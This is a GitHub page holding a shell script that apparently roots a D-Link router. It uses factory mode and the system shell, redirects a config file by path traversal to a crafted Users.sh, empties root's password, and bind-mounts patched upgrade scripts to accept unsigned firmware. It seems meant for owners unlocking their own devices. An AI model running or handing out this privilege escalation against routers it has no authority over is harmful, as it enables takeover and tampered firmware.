adbtools2/hack-script.sh at master · digiampietro/adbtools2 · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
#!/bin/ash
#
# script to be executed on router to become root:
# enter into facotry mode with the following commands:
#
# ===== step 1 ======
#valerio@ubuntu-hp:~$ telnet 192.168.1.1
# Trying 192.168.1.1...
# Connected to 192.168.1.1.
# Escape character is '^]'.
# Login: admin
# Password:

# ********************************************
# *                 D-Link                   *
# *                                          *
# *      WARNING: Authorised Access Only     *
# ********************************************

# Welcome
# DLINK# factory
# DLINK(factory)# factory-mode
# DLINK(factory)#
# DLINK(factory)# Connection closed by foreign host.
# ======== end of step 1

# the router reboots and restart in factory mode
# DHCP is disabled so you have to assign a static IP address
# to your PC to connecto to the router using ethernet
# now login again and enter a linux shell with the
# "system shell" command

# ======== step 2 =============
# valerio@ubuntu-hp:~$ telnet 192.168.1.1
# Trying 192.168.1.1...
# Connected to 192.168.1.1.
# Escape character is '^]'.
# Login: admin
# Password:

# ********************************************
# *                 D-Link                   *
# *                                          *
# *      WARNING: Authorised Access Only     *
# ********************************************

# Welcome
# DLINK# system shell


# BusyBox v1.17.3 (2018-04-11 12:29:54 CEST) built-in shell (ash)
# Enter 'help' for a list of built-in commands.

# /root $
# ======== end of step 2 ========

# now execute this script on the target copying it into the /tmp
# folder. You can use scp to copy this script from you Linux PC
# or you can do a simpler copy/paste to a file:
#
# ======== step 3 ===========
# /root $ cat > /tmp/hack-script.sh
#    do a copy and paste of this script
#    press CTRL-D to terminate the copy
#
# /root $ chmod a+x /tmp/hack-script.sh
# /root $ /tmp/hack-script.sh
# copy in /tmp and modify /etc/cm/tr181/dom/Management.xml
# replacing 'Users.sh' with '../../tmp/Users.sh'
# copy in /tmp and modify /etc/ah/Users.sh
# introducig the following line to enabl root without password:
# sed -i 's/^root:\*:0:0:root:/root::0:0:root:/'
# reconfiguring cm with the following command:
# cmclient DOM Device /tmp/Management.xml
# OK
# force excution of /tmp/Users.sh as root with the following command:
# cmclient ADD Device.Users.User
# 4
# Done, now you can become root with the following command:
# su -
# ======= end of step 3 ===========
#
# you can now become root as shown below
#
# ======= step 4
# /root $ su -
#
# BusyBox v1.17.3 (2018-04-11 12:29:54 CEST) built-in shell (ash)
# Enter 'help' for a list of built-in commands.
#
#  ..................................................................
# root@localhost:~#
# ====== end of step 4
#
# --------- copy/paste from the line below --------------------------
#!/bin/ash
echo "copy in /tmp and modify /etc/cm/tr181/dom/Management.xml"
echo "replacing 'Users.sh' with '../../tmp/Users.sh'"
cat /etc/cm/tr181/dom/Management.xml | \
    sed 's/Users.sh/\.\.\/\.\.\/tmp\/Users.sh/g' > /tmp/Management.xml

echo "copy in /tmp and modify /etc/ah/Users.sh"
echo "introducig the following line to enabl root without password:"
echo "  sed -i 's/^root:\*:0:0:root:/root::0:0:root:/'"

cat /etc/ah/Users.sh | \
    sed 's/\#\!\/bin\/sh/\#\!\/bin\/sh\nsed -i "s\/\^root:\\\*:0:0:root:\/root::0:0:root:\/" \/tmp\/passwd/' \
	> /tmp/Users.sh

chmod a+x /tmp/Users.sh

echo "reconfiguring cm with the following command:"
echo "cmclient DOM Device /tmp/Management.xml"

cmclient DOM Device /tmp/Management.xml

echo "force excution of /tmp/Users.sh as root with the following command:"
echo " cmclient ADD Device.Users.User"
cmclient ADD Device.Users.User
echo "Done, now you can become root with the following command:"
echo "su -"

echo "enable, until reboot, upgrade with an unsigned firmware"
cp -p /usr/sbin/upgrade.sh /tmp/upgrade.sh
cat /usr/sbin/upgrade.sh | sed  -r 's/ret_code\=\$\?/ret_code\=0/' > /tmp/upgrade.sh
su -c "mount --bind /tmp/upgrade.sh /usr/sbin/upgrade.sh" -

cp -p /usr/sbin/custom-upgrade-check.sh /tmp/custom-upgrade-check.sh
cat /usr/sbin/custom-upgrade-check.sh | sed 's/^exit 12/\$\(printError "ignoring previous error"\)/' > /tmp/custom-upgrade-check.sh
su -c "mount --bind /tmp/custom-upgrade-check.sh /usr/sbin/custom-upgrade-check.sh" -